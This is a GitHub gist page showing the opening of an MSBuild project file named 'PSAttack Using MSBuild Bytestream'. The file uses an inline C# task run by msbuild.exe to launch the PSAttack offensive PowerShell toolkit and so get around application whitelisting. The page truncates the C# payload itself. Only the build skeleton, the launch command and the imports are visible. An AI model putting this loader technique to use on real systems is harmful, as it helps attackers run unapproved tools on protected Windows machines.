Skip to content

Instantly share code, notes, and snippets.

@cryptonic01
Forked from NickTyrer/PSA_MSBUILD64.csproj
Created July 13, 2018 01:30
Show Gist options
  • Save cryptonic01/36cced77c5ec8a32950f6b355b4b1732 to your computer and use it in GitHub Desktop.
Save cryptonic01/36cced77c5ec8a32950f6b355b4b1732 to your computer and use it in GitHub Desktop.
PSAttack Using MSBuild Bytestream
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), -->
<!-- Based on Jared Haight work (https://github.com/jaredhaight/PSAttack), -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj -->
<Target Name="PSAttack">
<PSA_MSBUILD64 />
</Target>
<UsingTask
TaskName="PSA_MSBUILD64"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.Reflection" />
<Using Namespace=" System.Net" />
<Code Type="Fragment" Language="cs">
<![CDATA[
View raw

(Sorry about that, but we can’t show files that are this big right now.)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment